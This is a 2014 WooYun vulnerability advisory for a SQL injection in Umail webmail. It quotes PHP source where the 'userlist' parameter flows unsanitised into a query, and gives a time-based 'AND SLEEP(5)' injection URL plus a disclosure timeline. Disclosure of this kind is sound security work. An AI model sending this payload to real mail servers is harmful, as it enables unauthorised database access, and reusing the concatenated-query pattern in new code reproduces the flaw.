当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(14) 关注此漏洞

缺陷编号: WooYun-2014-72963

漏洞标题: Umail最新版SQL注入漏洞

相关厂商: UMAIL

漏洞作者: pandas

提交时间: 2014-08-21 14:42

公开时间: 2014-11-17 14:44

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: php源码审核 php源码分析

3人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-21: 细节已通知厂商并且等待厂商处理中
2014-08-23: 厂商已经确认,细节仅向厂商公开
2014-08-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2014-10-17: 细节向核心白帽子及相关领域专家公开
2014-10-27: 细节向普通白帽子公开
2014-11-06: 细节向实习白帽子公开
2014-11-17: 细节向公众公开

简要描述:

看到路人甲大牛又发威了,感觉这洞再捂就烂了...

详细说明:

漏洞文件:client\oab\module\operates.php

Line: 321

code 区域
if(ACTION == "save-to-pab")


{


    include_once(LIB_PATH."PAB.php");


    $PAB = PAB::getinstance();


    $maillist_id = gss($_GET['maillist']);


    if($maillist_id)


    {


        ...


    }


    else


    {


        $user_ids = gss( $_GET['userlist'] ); //几乎无过滤,过滤空格和判断gpc


        if ( !$user_ids )


        {


            dump_msg( "param_error", el( "参数错误!", "" ) );


        }


        $where = "t1.UserID IN (".$user_ids.")"; //问题?


        $arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//跟踪getMailboxInfo


        $user_all = $arr_tmp['data'];


        if ( !$user_all )


        {


            dump_json( array( "status" => TRUE, "message" => "" ) );


        }


        foreach ( $user_all as $user )


        {


            $qq = $msn = "";


            if ( strpos( $user['qqmsn'], "@" ) )


            {


                $msn = $user['qqmsn'];


            }


            else


            {


                $qq = $user['qqmsn'];


            }


            if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )


            {


                $data = array(


                    "user_id" => $user_id,


                    "fullname" => $user['FullName'],


                    "pref_email" => $user['email'],


                    "pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],


                    "birthday" => $user['birthday'],


                    "im_qq" => $qq,


                    "im_msn" => $msn,


                    "updated" => date( "Y-m-d H:i:s" )


                );


                $res = $PAB->add_contact( $data, 0 );


                if ( !$res )


                {


                    dump_json( array(


                                    "status" => FALSE,


                                    "message" => el( "添加联系人时发生错误,添加失败!", "" )


                    ) );


                }


            }


        }


    }


    dump_json( array( "status" => TRUE, "message" => "" ) );


}





function gss( $_obfuscate_xyiNieq6, $_obfuscate_l9WoIzJ5Xg = FALSE )


{


    $_obfuscate_xyiNieq6 = trim( $_obfuscate_xyiNieq6 );


    if ( !ini_get( "magic_quotes_gpc" ) && $_obfuscate_l9WoIzJ5Xg )


    {


        $_obfuscate_xyiNieq6 = addslashes( $_obfuscate_xyiNieq6 );


    }


    return $_obfuscate_xyiNieq6;


}





public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYw = "", $_obfuscate_AedrEg = "", $_obfuscate_xvYeh9I = "", $_obfuscate_tUi30UB0e88 = "", $_obfuscate_u5srL4rM3PZJLvpPhQ = FALSE, $_obfuscate_ySeUHBw = FALSE )


{


    $_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";


    if ( $_obfuscate_IRFhnYw )


    {


        $_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYw;//这行就足矣,代入SQL语句了


    }


    ....



漏洞证明:

payload: http://**.**.**.**/webmail/client/oab/index.php?module=operate&action=save-to-pab&userlist=1 AND SLEEP(5)



SQLMAP截图证明:

QQ20140812-1@2x.png





QQ20140812-2@2x.png



修复方案:

过滤

版权声明:转载请注明来源 pandas@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2014-08-23 23:38

厂商回复:

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-01-20 16:22 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    1

    obviously

    1# 回复此人

登录后才能发表评论,请先 登录